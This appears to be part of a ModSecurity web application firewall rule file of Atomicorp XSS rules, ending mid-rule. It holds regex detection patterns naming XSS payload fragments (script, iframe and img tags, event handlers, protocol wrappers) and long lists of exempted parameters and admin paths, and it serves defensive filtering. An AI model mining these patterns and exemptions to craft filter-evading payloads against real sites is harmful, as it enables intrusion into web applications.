SecRule MATCHED_VARS "!@rx ((?:submit(?:\+| )?(request)?(?:\+| )?>+|<<(?:\+| )remove|(?:sign ?in|log ?(?:in|out)|next|modifier|envoyer|add|continue|weiter|account|results|select)(?:\+| )?>+)$|^< ?\??(?: |\+)?xml|^<samlp|^>> ?$)"  "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase"

SecMarker END_XSS_ATTACKS_D1

SecRule REQUEST_HEADERS:REFERER|REQUEST_URI "(?:/plugins/editors/tinymce/jscripts/|/modules/tinymce/tinymce/jscripts|/phpinfo_iframe\.php|^pagead[0-9]\.googlesyndication\.com/pagead/|/wp-admin/press-this\.php|&(?:loc|u)='https?://|^/[a-z0-9/]+?\?fl_builder)"  "phase:2,nolog,noauditlog,id:343732,pass,t:none,t:urlDecodeUni,t:lowercase,skipAfter:END_XSS_ATTACKS_D2"

#XSS in referrer
SecRule REQUEST_HEADERS:REFERER "(?:= ?\' ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|< ?(?:script|about|applet|activex|chrome)|activexobject|(?:\.add|\@)import|asfunction\:|background-image\:|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|<input|\b(?:java|vb|live|j|e(?:cma|exec))script\b ?>|lowsrc ?=|mocha\:|<{1,200}.\bon(?:abort|blur|change|click|dragdrop|event|focus|keydown|move|resize|select|submit|unload|key(?:press|up)|load|mouse(?:down|move|out|over|up))\b|settimeout|shell:|< ?i(?:mg|frame) ?src ?=( |\+)?(?:\"|\')?(ht|f)tps?:/)" "phase:2,deny,log,auditlog,status:403,capture,id:340158,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,rev:20,severity:2,msg:'Atomicorp.com WAF Rules: XSS in referrer',logdata:'%{TX.0}'"
SecMarker END_XSS_ATTACKS_D2

#special exclusion for drupal webforms
SecRule REQUEST_URI "node/[0-9]+/webform/components/" "phase:2,deny,log,auditlog,status:403,capture,chain,t:none,t:urlDecodeUni,t:lowercase,id:320476,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
SecRule REQUEST_URI|ARGS|!ARGS:/^extra/|!ARGS:op|!ARGS:/desc/|!ARGS:areas|!ARGS:templatecode|!ARGS:value[value]|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:quote-form|!ARGS:value|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/header/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|\be(?:cma|xec)script\b|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|\bon(?:abort|blur|change|click|select|dragdrop|event|focus|keydown|keypress|keyup|mouse(?:down|move|out|over|up))\b|shell\:|window\.location|asfunction:_root\.launch|\%env)"  "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase"


#Rule 340152: IE XSS attack
#SecRule REQUEST_URI_RAW|REQUEST_BODY "(?:< ?object[ /+\t].*?((type)|(codetype)|(classid)|(code)|(data))[ /+\t]*=|< ?applet[ /+\t].*?code[ /+\t]*=|< ?base[ /+\t].*?href[ /+\t]*=|)" "phase:2,t:none,t:lowercase,log,auditlog,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack (IE variant)',id:340152,rev:24"


SecMarker END_XSS_ATTACKS

SecRule REQUEST_URI|REQUEST_HEADERS|REQUEST_BODY|ARGS|QUERY_STRING|!ARGS:areas|!ARGS:templatecode "@pm script expression html onevent onmouse img src onload onerror import asfunction: background-image: fromcharcode frame input lowsrc mocha onblur onselect onchange onclick ondragdrop onkeydown onkeypress onkeyup resize select unload shell: settimeout addimport @import url window.location < > env about applet activex chrome getparentfolder getspecialfolder href object" "id:333841,phase:2,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,multimatch,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334388,t:none,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_2"

#special exclusion for drupal webforms
SecRule REQUEST_URI "^/node/[0-9]+/webform/components/" "phase:2,deny,log,auditlog,status:403,chain,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:320475,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
SecRule REQUEST_URI|ARGS|!ARGS:areas|!ARGS:templatecode|ARGS_NAMES|!ARGS:/desc/|!ARGS:value|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:/^value/|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|(?:alert|document\.write) ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<|> ?\"? ?>|< ?/?i?frame|\%env)"  "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,multiMatch"

# Rule 340148:  XSS injection with multimatch checks
#XSS generic filter and suspicious web code detector
SecRule REQUEST_URI  |!ARGS:/^aftax/|"!(?:/(?:admin/(?:(?:build(?:/translate|/language/edit|/edit)?|catalog_category)/|settings/site-information|catalog/edit)|(?:miadmin/catalog_product|sitebuilder)/|wizard/edit/html|node/add/|filter-xss)|\/(?:admin\/(?:surveys\/[0-9]+\/edit\/|\?page=spageedit)|node\/[0-9]+\/(?:webform\/components\/|edit|clone))|^(?:\/\?(?:q=node\/[0-9]+\/edit|(s|v))|\?(s|v))|c=myaccount&m=update_profile$|mt\.cgi|/nav\.php\?nav=addnews|/products\.php\?action=(?:edit|update)|/systemadmin/configproducts\.php|/admin/catalog_product/|/index\.php\?tab=admincatalog|/admin/settings/customerror|^/ndxz-?studio/\?a=|/editform\?|/wizard/edit/|\?tab=admin|\?content=admin|\?action=modif|\?exec=articles_edit$|/admin/preview\.php|/sysext/tstemplate/|/site-builder/|/(?:new|edit)/[0-9]+/(?:confirm|add)|/admin/editform|/cms/admin/editform|^/filemanager/filemanager\.php|^/([a-z]+/)?admin/structure/|^/index.php/admin/system_config/|^/administrator/\?option=com_civicrm|^/za/zcadm|^/blog/roller-ui/authoring/entryedit|^/admin/(?:p(?:age_save|roduct_groups/edit/)|[a-z]+/[0-9]+/)|^/services?/bmwidget\.json|^/file/ajax/|^/manage/car/[a-z0-9]+/|^/[a-z0-9/]+?\?fl_builder|^/index\.php\?route=extension/d_quickcheckout/[a-z0-9_]+/update|^/[a-z0-9]+?/?admin[a-z0-9]+?/index\.php\?controller=admin|^/wp-admin/edit\.php\?post_type=event&page=events-manager-options)" "id:333842,rev:4,phase:2,t:none,t:lowercase,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334389,t:none,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D2"
#Filenames
SecRule REQUEST_FILENAME "!(/file-manager/edit/)" "id:366841,phase:2,t:none,t:lowercase,t:urlDecodeUni,pass,nolog,noauditlog,skip:1,rev:2"
        SecAction "phase:2,id:336688,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D2"

SecRule REQUEST_URI "^/index\.php\?ajax-proxy/" "id:321115,rev:1,phase:2,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_2"

# Rule 340148:  XSS injection with multimatch checks
SecRule ARGS|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS_NAMES|!ARGS:input_65|!ARGS:/^cont/|!ARGS:/introtext/|!ARGS:_message|!ARGS:/com_liferay/|!ARGS:/fbmcc/|!ARGS:/refuse_code/|!ARGS:/ide_/|!ARGS:/bsr_/|!ARGS:nav-menu-data|!ARGS:/sc_stats/|!ARGS:/contact_map/|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:/^dbem/!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:/option_tree/|!ARGS:/go_code/|!ARGS:/custom/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:/_head_/|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/suffix/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:ausgabe|!ARGS:eingabe|!ARGS:/previewdata/|!ARGS:/tracking_extra/|!ARGS:SAMLResponse|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:sotenson|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/customfield/|!ARGS:val333|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/tracking/|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/jscode/|!ARGS:postcontents|!ARGS:/keycaptcha_code/|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:sidebar|!ARGS:analyticscode|!ARGS:top_news|!ARGS:tracking_code|!ARGS:data[config]|!ARGS:fulltext|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:whats-new|!ARGS:/embed/|!ARGS:/desc/|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/footer/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:/script/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:/^field_/|!ARGS:match_report|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:/^instance/|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:eip_value|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:/signature/|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:/pagimenu/|!ARGS:/^jms/|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/|!ARGS:/infobox/  "(?:< ?/? ?script|< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|document\.write ?\(|(?:<|< ?/) ?(?:(?:java|vb)script|applet|activex|chrome|qx?ss|embed)|< ?/?i?frame\b|< ?img src ?=|< ?base href ?=)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhiteSpace,t:lowercase,multiMatch,id:340148,rev:162,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"

SecRule REQUEST_BODY "^< ?\??( |\+)?xml" "phase:2,id:333706,pass,t:none,t:urlDecodeUni,t:lowercase,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D2"

# Rule 350148:  potentially malicious web code with multimatch checks
SecRule REQUEST_URI "!(?:/admin/(?:[a-z]+/(?:save|module/update/|edit)|publish|\?op=edit|content/update|appearance/settings/|d/1/|pages/update|block_edit)|/secure/roundcube/|/edit/|/backend\.php/property/save|/home/add|/\?act=edit|/site-content/|/project/update/|/index\.php\?option=com_(?:easyblog|resource&controller=article|comprofiler&task=my_profile|aclassif)|/index.php/datafeedmanager/adminhtml_datafeedmanager/save|/index\.php\?mode=(?:new|edit)story|^/filemanager/filemanager\.php|^/user_info/edit_profile/|/admin/editor/|^/user.php\?op=edituser&htmltext=|^/admin/structure/|option=com_rsform&task=forms\.edit|^/ndxz-?studio/\?a=|^/support/agent|^/elements/save|^/settings/in_place_save/|^/ndxz2/|^/([a-z]+/)?index\.php/admin/s(?:ystem_config|ubject)/|^/(a-z)+/admin/programs/update_program|^/backoffice/\?op=edit|^/za/zcadm|^/efthuko\.php\?mod=editnews|^/mm-panel/index\.php|/ndxzstudio/|destination=admin/structure|/smart_forms/live/save_section\.php|^/mod_pagespeed|^/\?q=admin/appearance/settings|^/articles/(?:save|edit|add)|^/\?ptype=|/whmadmcp/addonmodules\.php|^/sh/file/|/multimediasave\.do|^/cms/|^/panel/index\.php|^/posts/edit|^/teksty/edytuj_akapit|^/egisportal/|/templatesavechanges|^/\?_task=mail|^/cpsess[0-9]+/scripts2?/|control_panel/manage\?p_p_id=com_liferay|^/[a-z0-9]+?/?admin[a-z0-9]+?/index\.php\?controller=admin|/wp-admin/edit\.php\?post_type=event&page=events-manager-options)" "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:lowercase,capture,id:350148,rev:169,severity:2,msg:'Atomicorp.com WAF Rules: Potentially Untrusted Web Content Detected ',logdata:'%{TX.0},%{matched_var}'"
SecRule ARGS|!ARGS:cont|!ARGS:/^addon/|!ARGS:/comenter/|!ARGS:/contenu/|!ARGS:/motd/|!ARGS:styles|!ARGS:/background/|!ARGS:/^go/|!ARGS:/overlay/|!ARGS:raw|!ARGS:accesshash|!ARGS:AUTOR01|!ARGS:/ads?code/|!ARGS:third_party_code|!ARGS:/partial/|!ARGS:/adsense/|!ARGS:/bericht/|!ARGS:whereOptions|!ARGS:/what/|!ARGS:/mensaje/|!ARGS:opis|!ARGS:/wyswie/|!ARGS:/cbPay/|!ARGS:dims|!ARGS:/__dnn/|!ARGS:/social/|!ARGS:/pfield/|!ARGS:/rules/|!ARGS:/go_code/|!ARGS:/app_list/|!ARGS:/^epp/|!ARGS:/shortcode/|!ARGS:/^akID/|!ARGS:/area_id/|!ARGS:head|!ARGS:tpl|!ARGS:export|!ARGS:/object/|!ARGS:cont|!ARGS:/custom/|!ARGS:/terms/|!ARGS:/snippet/|!ARGS:omesg|!ARGS:/google/|!ARGS:/geodir/|!ARGS:tele|!ARGS:code|!ARGS:dt|!ARGS:/color/|!ARGS:/theme/|!ARGS:/center/|!ARGS:/widget/|!ARGS:/^value/|!ARGS:/^custom/|!ARGS:/pass/|!ARGS:repair|!ARGS:/definition/|!ARGS:/daten/|!ARGS:/subject/|!ARGS:nw_brief|!ARGS:/Beschreibung/|!ARGS:process|!ARGS:/introcopy/|!ARGS:ausgabe|!ARGS:eingabe|!ARGS:Lead|!ARGS:/desc/|!ARGS:/itinerary/|!ARGS:/included/|!ARGS:/destination/|!ARGS:/training/|!ARGS:/^room_/|!ARGS:aname|!ARGS:/Education/|!ARGS:/wp_autosave/|!ARGS:return_to|!ARGS:/^profile_/|!ARGS:/^utm_/|!ARGS:ad|!ARGS:namestyle|!ARGS:/ULTIMATUM/|!ARGS:/^mce_/|!ARGS:/uutinen/|!ARGS:/agree/|!ARGS:/artwork/|!ARGS:/overview/|!ARGS:/_section_/|!ARGS:/Button/|!ARGS:/^prod/|!ARGS:btnApply|!ARGS:/^VALUE\[1\]$/|!ARGS:/^system/|!ARGS:/gacode/|!ARGS:sample|!ARGS:/source_code/|!ARGS:/Settings/|!ARGS:code1|!ARGS:sotenson|!ARGS:view|!ARGS:record_json|!ARGS:geweest|!ARGS:send|!ARGS:pressestimmen|!ARGS:name|!ARGS:imagemap|!ARGS:/^extra/|!ARGS:afbeelding|!ARGS:action_name|!ARGS:nieuwsbrief|!ARGS:/locatie/|!ARGS:ingredients|!ARGS:priceField|!ARGS:inhoud|!ARGS:op|!ARGS:f_main|!ARGS:/error/|!ARGS:uvod|!ARGS:/^field_/|!ARGS:customized|!ARGS:/fullnews/|!ARGS:/^textarea-video/|!ARGS:komentar|!ARGS:/_layout_/|!ARGS:/^FieldValue/|!ARGS:/includes/|!ARGS:areacomum|!ARGS:lomake|!ARGS:vastaus|!ARGS:target|!ARGS:vraag|!ARGS:areaprivativa|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:quote|!ARGS:/^help_/|!ARGS:/^ADVERT_/|!ARGS:userdata|!ARGS:source|!ARGS:sisalto|!ARGS:reg_rules|!ARGS:areas|!ARGS:code_area_text|!ARGS:datos|!ARGS:templatecode|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:mes|!ARGS:json|!ARGS:wpreason|!ARGS:extended|!ARGS:/Kirjoitukset/|!ARGS:/x_line_item/|!ARGS:item_list|!ARGS:/^var_value/|!ARGS:valori|!ARGS:/pimage/|!ARGS:/^instance/|!ARGS:/allowedTags/|!ARGS:/^button/|!ARGS:/^zcck/|!ARGS:/accommodation/|!ARGS:/^breves/|!ARGS:/restaurant/|!ARGS:/testimonial/|!ARGS:headstone|!ARGS:/^book/|!ARGS:/log/|!ARGS:/metatags/|!ARGS:/^customfield/|!ARGS:/embed/|!ARGS:/leftcol/|!ARGS:/rightcol/|!ARGS:feature|!ARGS:/banner/|!ARGS:cb_talks|!ARGS:/synopsis/|!ARGS:/^fields/|!ARGS:notice|!ARGS:/formcode/|!ARGS:val333|!ARGS:receipt_address|!ARGS:changedept|!ARGS:/teaser/|!ARGS:EnTrar|!ARGS:cv|!ARGS:dati|!ARGS:/qualification/|!ARGS:/results/|!ARGS:/experience/|!ARGS:/plan/|!ARGS:/detail/|!ARGS:log|!ARGS:do|!ARGS:narrative|!ARGS:/promo/|!ARGS:/offer/|ARGS_NAMES|!ARGS:do|!ARGS:/^bt_|!ARGS:/short/|!ARGS:perex|!ARGS:/contact/|!ARGS:advanced|!ARGS:/google_analytics/|!ARGS:/bio/|!ARGS:rules|!ARGS:meta|!ARGS:/next/|!ARGS:ad_code|!ARGS:review|!ARGS:/feed/|!ARGS:/bbclosed/|!ARGS:/observacao/|!ARGS:/caption/|!ARGS:logoutRequest|!ARGS:/js_payload/|!ARGS:video1|!ARGS:/abstract/|!ARGS:/para/|!ARGS:/highlight/|!ARGS:/config/|!ARGS:/welcome/|!ARGS:des|!ARGS:/notice/|!ARGS:structure|!ARGS:/table/|!ARGS:tag|!ARGS:romancode|!ARGS:model|!ARGS:pwd|!ARGS:thecode|!ARGS:/tweet/|!ARGS:do|!ARGS:/^input_/|!ARGS:dhltrack|!ARGS:reflection|!ARGS:media|!ARGS:rqst|!ARGS:blurb|!ARGS:/OSDCS/|!ARGS:Thankyou|!ARGS:img_alt|!ARGS:waarde|!ARGS:/statement/|!ARGS:continue|!ARGS:/writing/|!ARGS:drugs|!ARGS:text1|!ARGS:terms|!ARGS:/announ/|!ARGS:/^eeta-/|!ARGS:/^News/|!ARGS:main|!ARGS:notes|!ARGS:validatepromo|!ARGS:payment_sel|!ARGS:request|!ARGS:copy|!ARGS:/MapField/|!ARGS:/email/|!ARGS:/admin/|!ARGS:profile|!ARGS:contenu|!ARGS:/suffix/|!ARGS:/prefix/|!ARGS:pc_main|!ARGS:/instructions/|!ARGS:/submit/|!ARGS:/title/|!ARGS:/xjxargs/|!ARGS:/info/|!ARGS:nav|!ARGS:recompose|!ARGS:compose|!ARGS:/^bname/|!ARGS:/^property/|!ARGS:groupWelcomeScreen|!ARGS:block|!ARGS:xsym_sym_brief|!ARGS:langbericht|!ARGS:btnCheckout|!ARGS:lease|!ARGS:/^copyright/|!ARGS:creategallery|!ARGS:cleaning|!ARGS:/reply/|!ARGS:/^gui/|!ARGS:/sig/|!ARGS:/Import_Cell/|!ARGS:livezillacode|!ARGS:/^bbcode/|!ARGS:_cc|!ARGS:resume|!ARGS:next|!ARGS:addtoclass|!ARGS:/intro/|!ARGS:registration_discounts|!ARGS:/opportunit/|!ARGS:registration_prices|!ARGS:workshop|!ARGS:venue|!ARGS:/^mainman/|!ARGS:features|!ARGS:/problem/|!ARGS:subhead|!ARGS:agenda|!ARGS:/question/|!ARGS:/answer/|!ARGS:entry|!ARGS:/form/|!ARGS:/footer/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:/script/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:/description/|!ARGS:/report/|!ARGS:/product_desc/|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS: